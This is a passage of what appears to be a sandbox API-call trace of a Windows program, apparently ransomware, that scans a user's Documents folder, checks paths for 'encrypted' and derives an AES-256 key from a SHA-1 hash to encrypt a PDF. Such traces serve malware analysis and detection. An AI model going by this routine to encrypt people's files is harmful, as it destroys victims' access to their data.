dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.374] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.374] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.374] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.374] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.374] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.374] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.374] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0xd039be70, ftLastWriteTime.dwHighDateTime=0x1d5b7b0, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0x7c2100 [0035.374] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.374] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.374] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.375] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.375] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.375] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.375] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.375] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.376] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.376] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.377] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.377] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.377] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.377] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.377] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.377] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.377] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.377] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.377] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.378] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.378] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.378] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.379] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.379] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.379] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.379] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.380] RtlAllocateHeap 